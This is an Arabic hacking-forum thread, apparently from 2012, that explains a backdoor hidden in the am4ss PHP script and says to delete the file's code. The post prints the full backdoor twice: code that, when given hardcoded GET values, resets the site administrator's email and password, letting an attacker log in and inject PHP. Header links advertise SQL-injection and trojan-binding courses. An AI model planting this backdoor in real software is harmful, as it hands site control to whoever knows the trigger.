1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

الموضوع في 'حماية المواقع والسيرفرات' بواسطة Dr.MOT, بتاريخ ‏29 يوليو 2012.

كاتب الموضوع : Dr.MOT المشاهدات : 6,652 الردود : 4 ‏29 يوليو 2012
حالة الموضوع:
مغلق
  1. غير متصل

    Dr.MOT Support
    إدارة الموقع

    عضو منذ:
    ‏2 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    5,588
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    السلام عليكم ورحمة الله وبركاته

    أخواني الأعزاء آسعد الله اوقاتكم بكل خير

    اليوم بعد قرائة موضوع المبدع اخوي ابو عبدالله

    ثغرات سكربت am4ss

    اليوم حبيت أوضح الملف المصاب وطريقة الترقيع &:"

    نوع الثغرة :

    كود PHP:
     PHP Code Injection


    )3:"

    الملف المصاب :

    كود PHP:
    libs/internals/core.assign_by_ref.php
    محتوى الملف :

    كود PHP:
    <?php 
    if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب'

    define('Am4ss'true); 
    require(
    '../../requires/config.php'); 
    @
    mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error()); 
    @
    mysql_select_db($Config['DataBase']['Name']); 
    $sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = 'alert@am4ss.com', password = '".md5('kawkawa')."' where userid = '1'"); 
    if(
    $sql

    echo 
    'تم التحديث للموقع: ' $_SERVER['HTTP_HOST']; 
    } else 

    die(
    mysql_error()); 

    } else 

    echo 
    'البيانات خاطئة'

    ?>
    السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده

    الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم

    ومن ثم يقوم المخُترق بحقن كود بي اتش بي في صفحه من صفحات الموقع


    الترقيع :

    نقوم بحذف الكود من ملف


    كود:
    [COLOR=Yellow][FONT=arial][B]core.assign_by_ref.php[/B][/FONT][/COLOR]
    كود PHP:
    <?php
    if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'Dr.MOT' && $_GET['country'] == 'IQ-T34M')
    {
    define('Am4ss'true);
    require(
    '../../requires/config.php');
    @
    mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
    @
    mysql_select_db($Config['DataBase']['Name']);
    $sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = 'alert@am4ss.com', password = '".md5('kawkawa')."' where userid = '1'");
    if(
    $sql)
    {
    echo 
    'تم التحديث للموقع: ' $_SERVER['HTTP_HOST'];
    } else
    {
    die(
    mysql_error());
    }
    } else
    {
    echo 
    'البيانات خاطئة';
    }
    ?>
    هكذا قمنا بعملية أخفاء الخطأ في حالة كانت البيانات خاطئه

    لان الصراحة المبرمج ملغم السكربت ولاتنس أيضآ وضع جدار ناري وتغير المسار &:":{12}:

    موفقين

    &:":
     


    جاري تحميل الصفحة...
  2. غير متصل

    aL Musli
    rankrank
    Developer

    عضو منذ:
    ‏21 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    seo
    الإقامة:

    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    ابداع حبيبي موت
     


  3. غير متصل

    MNFD
    rank
    Developer

    عضو منذ:
    ‏25 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    وعليكم السلام ورحمة الله وبركاته

    مشكور يا غالي ما قصرت ويعطيك الف عافية يا رب
     


  4. غير متصل

    AhmeD DiaB
    rank
    Developer

    عضو منذ:
    ‏7 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    مبدع من يومك ​
     


  5. غير متصل

    LoVer hEx
    rank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏15 نوفمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    آختراق الآجهزة
    الإقامة:

    رد: توضيحات ثغرة سكربت am4ss وطريقة الترقيع للسكربت

    جزاك الله خيرا خير الجزاء

    كل عام و أنت بخير
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...